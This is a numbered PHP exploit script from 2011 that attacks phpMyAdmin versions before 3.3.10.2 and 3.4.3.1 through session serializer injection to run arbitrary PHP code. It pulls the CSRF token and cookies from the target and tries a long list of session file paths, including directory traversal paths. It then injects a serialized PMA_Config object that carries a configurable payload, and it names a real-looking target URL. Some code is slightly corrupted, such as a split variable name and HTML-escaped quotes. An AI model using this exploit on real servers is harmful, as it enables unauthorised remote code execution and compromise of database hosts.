<?php /* phpMyAdmin < 3.3.10.2 & < 3.4.3.1 Session Serializer arbitrary PHP

1. <?php
2. /*
3. phpMyAdmin < 3.3.10.2 & < 3.4.3.1 Session Serializer arbitrary PHP code execution exploit
4. by M4g, ICQ 884888, http://snipper.ru, (c) 2011
5. ---
6. PHP depending and settings on the target PMA installation: magic_quotes_gpc = off, PHP <= 5.2.13 & PHP <= 5.3.2
7. ---
8. Links & Thanks:
9. 0. http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/
10. 1. http://php-security.org/2010/05/31/mops-2010-060-php-session-serializer-session-data-injection-vulnerability/index.html
11. 2. https://rdot.org/forum/showthread.php?t=286
12. 3. http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html
13. 4. http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
14. */
15.  
16. /*Settings*/
17. $pmaurl = &#039;http://l2rf.ru/myadmin/&#039;; //full PMA url
18. $payload = &#039;<?php phpinfo(); ?>&#039;; //PHP code to execute
19. /*Settings*/
20.  
21. /*-------------------------------------------EXPLOIT CODE-------------------------------------------*/
22.  
23. $count_redirects = 0;
24. $max_redirects = 5;
25.  
26. //отправляем http-данные
27. //$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent, other headers, timeout, what to show = (0-all, 1-body, 2-headers), redirect = 0|1
28. function send_data($method, $url, $data = &#039;&#039;, $referer_string = &#039;&#039;, $cookie_string = &#039;&#039;, $ua_string = &#039;Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8&#039;, $other_headers= &#039;&#039;, $timeout = 30, $show = 0, $follow_redirect=0)
29. {
30. global $count_redirects,$max_redirects;
31. $return = &#039;&#039;;
32. $feof_count = 0;
33.  
34. $parsed_url = parse_url($url);
35. $site = $parsed_url[&#039;host&#039;];
36. $path = $parsed_url[&#039;path&#039;];
37. $query = $parsed_url[&#039;query&#039;];
38.  
39. if(preg_match(&#039;@_$@i&#039;,$query) && !preg_match(&#039;@_$@i&#039;,$url))
40. $query = rtrim($query,&#039;_&#039;);
41.  
42. if(preg_match(&#039;@_$@i&#039;,$path) && !preg_match(&#039;@_$@i&#039;,$url))
43. $path = rtrim($path,&#039;_&#039;);
44.  
45. ($method == &#039;GET&#039; && !empty($data)) ? $path .= &#039;?&#039;.$data : &#039;&#039;;
46. ($method == &#039;GET&#039; && !empty($query) && empty($data)) ? $path .= &#039;?&#039;.$query : &#039;&#039;;
47. ($method == &#039;POST&#039; && !empty($query)) ? $path .= &#039;?&#039;.$query : &#039;&#039;;
48.  
49. if($fp = fsockopen($site, 80, $errno, $errstr, $timeout))
50. {
51. ($method == &#039;POST&#039;) ? $out = "POST $path HTTP/1.1\r\n" : $out = "GET $path HTTP/1.1\r\n";
52. $out .= "Host: $site\r\n";
53. $out .= "Content-type: application/x-www-form-urlencoded\r\n";
54. $out .= "Connection: Close\r\n";
55. $out .= "User-Agent: $ua_string\r\n";
56. !empty($referer_string) ? $out .= "Referer: $referer_string\r\n" : &#039;&#039;;
57. !empty($cookie_string) ? $out .= "Cookie: $cookie_string\r\n" : &#039;&#039;;
58. !empty($other_headers) ? $out .= $other_headers : &#039;&#039;;
59. ($method == &#039;POST&#039;) ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" : $out .= "\r\n";
60. ($method == &#039;POST&#039;) ? fwrite($fp, $out.$data) : fwrite($fp, $out);
61.  
62. while (!feof($fp))
63. {
64. if($feof_count >=10000)
65. break;
66.  
67. $return .= fread($fp, 4800);
68. ++$feof_count;
69. }
70.  
71. fclose($fp);
72.  
73. if($follow_redirect)
74. {
75. if($count_redirects<$max_redirects)
76. {
77. if(preg_match(&#039;@Location: (.+)@i&#039;,$return,$redirect_match))
78. {
79. $count_redirects++;
80. $return = send_data($method, $redirect_match[1], $data, $referer_string, $cookie_string, $ua_string, $other_headers, $timeout, $show, $follow_redirect);
81. $count_redirects = 0;
82. }
83. }
84. else
85. return &#039;Max redirects = &#039;.$max_redirects;
86. }
87.  
88. if($show == 1)
89. {
90. $return = explode("\r\n\r\n",$return);
91. $return = $return[1];
92. }
93. elseif($show == 2)
94. {
95. $return = explode("\r\n\r\n",$return);
96. $return = $return[0];
97. }
98.  
99. return $return;
100. }
101. else
102. return array(&#039;errno&#039; => $errno, &#039;errstr&#039; => $errstr);
103. }
104.  
105. $pmaurl = rtrim($pmaurl,&#039;/&#039;).&#039;/index.php&#039;;
106.  
107. //Regards to asddas
108. $sess_path = array(&#039;/tmp/&#039;,
109. &#039;/var/tmp/&#039;,
110. &#039;/var/lib/php/&#039;,
111. &#039;/var/lib/php4/&#039;,
112. &#039;/var/lib/php5/&#039;,
113. &#039;/var/lib/php/session/&#039;,
114. &#039;/var/lib/php4/session/&#039;,
115. &#039;/var/lib/php5/session/&#039;,
116. &#039;/shared/sessions&#039;,
117. &#039;/var/php_sessions/&#039;,
118. &#039;/var/sessions/&#039;,
119. &#039;/tmp/php_sessions/&#039;,
120. &#039;/tmp/sessions/&#039;,
121. &#039;../../../tmp/&#039;,
122. &#039;../../../../tmp/&#039;,
123. &#039;../../../../../tmp/&#039;,
124. &#039;../../../../../../tmp/&#039;,
125. &#039;../../../../../../../tmp/&#039;,
126. &#039;../../../temp/&#039;,
127. &#039;../../../../temp/&#039;,
128. &#039;../../../../../temp/&#039;,
129. &#039;../../../../../../temp/&#039;,
130. &#039;../../../../../../../temp/&#039;,
131. &#039;../../../sessions/&#039;,
132. &#039;../../../../sessions/&#039;,
133. &#039;../../../../../sessions/&#039;,
134. &#039;../../../../../../sessions/&#039;,
135. &#039;../../../../../../../sessions/&#039;,
136. &#039;../../../phptmp/&#039;,
137. &#039;../../../../phptmp/&#039;,
138. &#039;../../../../../phptmp/&#039;,
139. &#039;../../../../../../phptmp/&#039;,
140. &#039;../../../../../../../phptmp/&#039;);
141.  
142. //1. Token, Session name and Cookies
143. $token_page = send_data(&#039;GET&#039;,$pmaurl);
144.  
145. preg_match(&#039;@name="token" value="([a-f0-9]{32})"@is&#039;,$token_page,$token_array);
146.  
147. $token = $token_array[1];
148.  
149. preg_match_all(&#039;@Set-Cookie: ([^\r\n;]+)@is&#039;,$token_page,$cookie_array);
150.  
151. $cookie_array = $cookie_array[1];
152. $cookie_array = implode("; ",$cookie_array);
153.  
154. preg_match(&#039;@phpMyAdmin=([a-z0-9]{32,40});?@is&#039;,$token_page,$session_array);
155.  
156. $session = $session_array[1];
157.  
158. //2. Inject into session testing
159.  
160. $sess_test_page = &#039;&#039;;
161. $o = 0;
162. $good_inj = false;
163.  
164. do
165. {
166. $inj = $sess_path[$o].&#039;sess_&#039;.$session;
167. $query = $pmaurl.&#039;?session_to_unset=123&token=&#039;.$token.&#039;&_SESSION[!bla]=&#039;.urlencode(&#039;|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:&#039;.strlen($inj).&#039;:"&#039;.$inj.&#039;";}}&#039;);
168. $sess_test_page = send_data(&#039;GET&#039;,$query,&#039;&#039;,$pmaurl,$cookie_array);
169. $sess_test_page2 = send_data(&#039;GET&#039;,$pmaurl.&#039;?token=&#039;.$token,&#039;&#039;,$pmaur l,$cookie_array);
170.  
171. if(stristr($sess_test_page2,&#039;PMA_Config&#039;))
172. {
173. $good_inj = $inj;
174. flush();
175. print &#039;[+] &#039;.$inj.&#039; - good path<br/>&#039;;
176. break;
177. }
178. else
179. {
180. flush();
181. print &#039;[-] &#039;.$inj.&#039; - bad path<br/>&#039;;
182. }
183. $o++;
184. }
185. while($o < count($sess_path));
186.  
187. if($good_inj)
188. {
189. $query = $pmaurl.&#039;?session_to_unset=123&token=&#039;.$token.&#039;&_SESSION[!bla]=&#039;.urlencode(&#039;|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:&#039;.strlen($good_inj).&#039;:"&#039;.$good_inj.&#039;";}}&#039;).&#039;&_SESSION[payload]=&#039;.urlencode($payload);
190. $sess_test_page = send_data(&#039;GET&#039;,$query,&#039;&#039;,$pmaurl,$cookie_array);
191. $sess_test_page2 = send_data(&#039;GET&#039;,$pmaurl.&#039;?token=&#039;.$token,&#039;&#039;,$pmaur l,$cookie_array);
192.  
193. print $sess_test_page2;
194. }
195. else
196. die(&#039;[+] Session path was not found&#039;);